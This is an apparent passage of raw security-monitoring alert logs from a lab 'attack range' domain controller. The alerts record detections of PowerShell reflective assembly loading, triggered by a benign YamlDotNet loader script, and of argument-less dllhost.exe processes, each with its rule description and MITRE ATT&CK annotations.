\"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664686532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664686532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664679600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664679600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4372", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664679600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664679600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1114", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664682931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664682931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664682931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T02:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T02:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664682931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", 